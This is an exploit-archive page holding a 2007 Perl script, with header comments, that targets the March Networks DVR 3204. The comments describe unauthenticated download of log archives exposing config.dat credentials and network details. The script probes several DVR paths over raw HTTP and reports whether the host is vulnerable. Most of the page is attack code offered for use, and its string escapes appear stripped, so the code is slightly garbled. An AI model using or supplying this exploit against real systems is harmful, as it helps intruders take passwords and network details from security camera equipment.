March Networks DVR 3204 Logfile Information Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : March Networks DVR 3204 Logfile Information Disclosure Exploit
# Published : 2007-12-27
# Author : Alex Hernandez
# Previous Title : Persits Software XUpload Control AddFolder() Buffer Overflow Exploit
# Next Title : BadBlue 2.72 PassThru Remote Buffer Overflow Exploit

#!/usr/bin/perl
#
# March Networks DVR 3204 Logfile Information Disclosure Exploit
#
# Since configuration of the IP address, user console and root is 
# carried out over the "administrator console", the vulnerability 
# lies within Watchdog's HTTP server application.
#
# Any user can obtain the log files without authentication by accessing
# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder
# can then uncompress the tar file and access the config.dat to reveal
# username and passwords, names of devices, and IP addresses of other 
# security components attached to the corporate networ
#
# More details: 
# http://www.sybsecurity.com/resources/static/
# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf
#
# By Alex Hernandez ahernandez [at] sybsecurity [dot] com
#
# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80
# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80
#
# $ perl -x dvr3204_exp.pl 10.50.10.246:80
# Trying...
#
# THIS HOST IS VULNERABLE!!! :-)
# Check the details on w w w [dot] sybsecurity [dot] c o m
#
# THIS HOST IS NOT VULNERABLE :-(
# Check the settings on browser...
#
# 

use Socket;

if ($#ARGV<0) {die "
nMarch Networks DVR 3204 exploitn
More details: http://www.sybsecurity.com
By Alex Hernandezn 
ahernandez [at] sybsecurity [dot] comn

Usage: perl -x $0 www.marchnetworks.com:80
Usage: perl -x $0 127.0.0.1:80nn";}

($host,$port)=split(/:/,@ARGV[0]);

print "Trying...nn";
$target = inet_aton($host);
$flag=0;

my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/index.htm HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/dvrlog HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0rnrn");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}

if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)n
Check the details on www [dot] sybsecurity [dot] comn";}
else {print "THIS HOST IS NOT VULNERABLE :-( n
Check the settings on browser...n";}

sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problemsn");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S); $|=1; print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect check the port or address...n"); }
}

# www.Syue.com [2007-12-27]